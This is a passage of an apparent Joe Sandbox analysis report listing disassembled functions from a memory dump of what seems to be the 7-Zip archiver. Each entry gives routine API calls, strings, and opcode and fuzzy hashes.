                                                                                                                                                                                                • Opcode ID: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
                                                                                                                                                                                                • Instruction ID: 9074a9478ae008e381f801c9e6ee4a007131c2c4ed013b5790ef38a060707c48
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2efab2b554c4f96bbbe87714b73d16ad6655604f82f8fcc69e920b2b3405c337
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811216321494190CA20FF64D8A179D6730FBC47E8FC45622F65E476B9DF28C68AC700
                                                                                                                                                                                                Function 00942974 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: a$z
                                                                                                                                                                                                • API String ID: 0-4151050625
                                                                                                                                                                                                • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                • Instruction ID: 6146816279ad7b8a28064577f08052ac67f9dac89c74a5e75ba22b3fce658244
                                                                                                                                                                                                • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01FF16F2019AC1EB307B12AB64BF8A756BB06F91FDD8133BE8D07311E11949C2E305
                                                                                                                                                                                                Function 0094AD0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                                                • API String ID: 1646373207-1489217083
                                                                                                                                                                                                • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                • Instruction ID: 6d5f811490bf57d8a6d737b214182e4cb90a4aa6a458a61d0dfcc95018f1a61a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 81F06236B9550487DF30DB20F494BA963A4E788316F945835E65B42BE4DB3CD98CCB05
                                                                                                                                                                                                Function 0098BAAC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BACF
                                                                                                                                                                                                • fputs.MSVCRT ref: 0098BAFC
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 0094237E
                                                                                                                                                                                                  • Part of subcall function 00942320: fputs.MSVCRT ref: 009423B8
                                                                                                                                                                                                  • Part of subcall function 00942320: free.MSVCRT ref: 009423C4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                • String ID: Open archive: $StdOut
                                                                                                                                                                                                • API String ID: 3873070119-2401103298
                                                                                                                                                                                                • Opcode ID: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
                                                                                                                                                                                                • Instruction ID: 5e58de3206828fc5332bf15bd3fc388f44b37dd95f92a7f998a4a4482670f91e
                                                                                                                                                                                                • Opcode Fuzzy Hash: ce59a64c16b32fbdc4fabaafe929a8674e998fc0354dffc2ed294dc1c66bfb13
                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F0FEA5301D8581DE059F6AD99576D5321FB85FD4F58D432DD0E4B31DDF28C49AC310
                                                                                                                                                                                                Function 00982344 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$fputc
                                                                                                                                                                                                • String ID: $:
                                                                                                                                                                                                • API String ID: 1185151155-4041779174
                                                                                                                                                                                                • Opcode ID: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
                                                                                                                                                                                                • Instruction ID: dec48a622a10082c540ffa54406191a85b8e55102bcf4313f88b17200f982281
                                                                                                                                                                                                • Opcode Fuzzy Hash: 158b50a13c805fd8231fb2a9988c9be95edbaf40012f3606b1facd01aece21a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 96E06D96304A8081CB119B26E85435D6321FB9AFCCF489122EE8E0771ADE2CC148C711
                                                                                                                                                                                                Function 0098D4C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                                                                • API String ID: 1646373207-2515562745
                                                                                                                                                                                                • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                • Instruction ID: a384d62d6c09014c41565aa88c8d49661ae8f0304396f647c7b01522c88e1526
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                                                                                                                                                                                • Instruction Fuzzy Hash: 84E0B664763B0191FE09EF55FCA536823A4BB8BB14F94582AC51E86361EF3CD689C380
                                                                                                                                                                                                Function 009771BC Relevance: 6.5, APIs: 5, Instructions: 203COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 408039514-0
                                                                                                                                                                                                • Opcode ID: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                • Instruction ID: 90bc2c19c40bfa48688fb8ce54800e9d222946eb366707182463f1078326ba00
                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c40869ad587d79d1a4cde6791f56a7827730960875fe2f1716f54cae6806b2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B816C33319A4082CB24DF65E48076DB7A5F788BA4F548225EF9E43B68EF38C855C700
                                                                                                                                                                                                Function 00954210 Relevance: 6.4, APIs: 5, Instructions: 126COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                • Instruction ID: 0a936c84f166b54dafed5e5b978007e9e5289dc04faf25ee7d85d0dad7fc2148
                                                                                                                                                                                                • Opcode Fuzzy Hash: 735d4e83ff881ba3abcc4a6c9aa5d61f64a5c4c51b6bddb4a0ec876fb6e64911
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1941C32231568096CB64DF23E54066E67A4FB8ABE9F485211FFAD0BB59DF38C589C700
                                                                                                                                                                                                Function 00974C2C Relevance: 6.4, APIs: 5, Instructions: 114COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                • Instruction ID: 690e242acf12fcca5e3f5d5d758d14b1740bbb469b8d6b151bd4804eb89c2be0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d6c9dfe1155a16f3a068d7370a8ec758800c3918b65cbcdfef43df97f9f1dc5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3941E52720C2C085CB31DB25E44069FABA1F3D6798F584215FBDA0BB9AD77ED099CB11
                                                                                                                                                                                                Function 0097F4AC Relevance: 6.3, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ErrorLastmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3561842085-0
                                                                                                                                                                                                • Opcode ID: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                • Instruction ID: a80e5bb77d812c2a91d247e8cc3fbc238572b0b0e8d8092905ea68ae6d09dffa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 835e30b8a2ce9afd242e3c27a4bd6d2521a716217a04de116505d45ba31023b0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A317273214A4182CB24DF24E46075E7360FBC9BA4F949221F76E477A9DF38C589C700
                                                                                                                                                                                                Function 0094EF70 Relevance: 6.3, APIs: 5, Instructions: 91COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                • Opcode ID: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                • Instruction ID: 3fb0e0d394845d644dbc0b02c44eae95e6c64f6801605946359ecb2a25a5ccb7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C21CE32711B858ADA14EF56E994A297364FB89BE4B488235EF2D0B795DF34D862C300
                                                                                                                                                                                                Function 0094C790 Relevance: 6.3, APIs: 5, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                • Instruction ID: 01868acfd3ffb6e696227e37ec6d29ce31069ebbee2ed42a8928da53d17da900
                                                                                                                                                                                                • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4011C2F230A74199EB44AF2A98657A82229DB59FD4F859425CE058B306FF38CE45C304
                                                                                                                                                                                                Function 00943BE4 Relevance: 6.3, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00943C2A
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00943C36
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00943C54
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00943C80
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00943C9E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2296236218-0
                                                                                                                                                                                                • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                • Instruction ID: 355fef8fe33bb7cb0f48fddca5a9d87a151a61109ed482a4757c64db9948041b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C21B4B2704B4886DB20DF26E85471DB7A1FB89F99F54C125DE8943724EF78C845C700
                                                                                                                                                                                                Function 0094182C Relevance: 6.3, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                • Instruction ID: 570be1150bac292b34e31c211bbe1e8573d38d1b63acdbbb9af821b6102e49e7
                                                                                                                                                                                                • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2101922370699496DA28EF26D910A6D2320FBCAFB4B584321BF6D17795CF24D892C340
                                                                                                                                                                                                Function 00987D84 Relevance: 6.3, APIs: 5, Instructions: 42COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 00987DA9
                                                                                                                                                                                                • free.MSVCRT ref: 00987DB2
                                                                                                                                                                                                • free.MSVCRT ref: 00987DE5
                                                                                                                                                                                                • free.MSVCRT ref: 00987DF2
                                                                                                                                                                                                • free.MSVCRT ref: 00987DFB
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 009694DB
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 009694E3
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 009694F0
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 0096951C
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 00969525
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 0096952D
                                                                                                                                                                                                  • Part of subcall function 009694A8: free.MSVCRT ref: 0096953A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                • Instruction ID: 913dddcc5b340158dccf13b74ade2e61927c98d43172aba499e41cd0a86df8f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8601622371699089CA15BF29DC5176C6364FF89FA4F690121EF1D4B365EE21C882C390
                                                                                                                                                                                                Function 00963864 Relevance: 6.3, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 00963877
                                                                                                                                                                                                  • Part of subcall function 00960BBC: free.MSVCRT ref: 00960BCC
                                                                                                                                                                                                  • Part of subcall function 00960BBC: free.MSVCRT ref: 00960BD5
                                                                                                                                                                                                  • Part of subcall function 00960BBC: free.MSVCRT ref: 00960C00
                                                                                                                                                                                                  • Part of subcall function 00960BBC: free.MSVCRT ref: 00960C08
                                                                                                                                                                                                  • Part of subcall function 00961474: free.MSVCRT ref: 009614A6
                                                                                                                                                                                                  • Part of subcall function 00961474: free.MSVCRT ref: 009614AF
                                                                                                                                                                                                  • Part of subcall function 00961474: free.MSVCRT ref: 009614B8
                                                                                                                                                                                                  • Part of subcall function 00961474: free.MSVCRT ref: 009614C0
                                                                                                                                                                                                • free.MSVCRT ref: 00963892
                                                                                                                                                                                                • free.MSVCRT ref: 0096389B
                                                                                                                                                                                                • free.MSVCRT ref: 009638C6
                                                                                                                                                                                                • free.MSVCRT ref: 009638CE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                • Instruction ID: 05d6ea1bf407d5629f5ab2dc933758ca7b49ff3161730f8af0cb3434f085c8fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0F03123B1689096CA19FF26DD916AC2364FFC9F9474D4161BF1D4B751DF50C9A28340
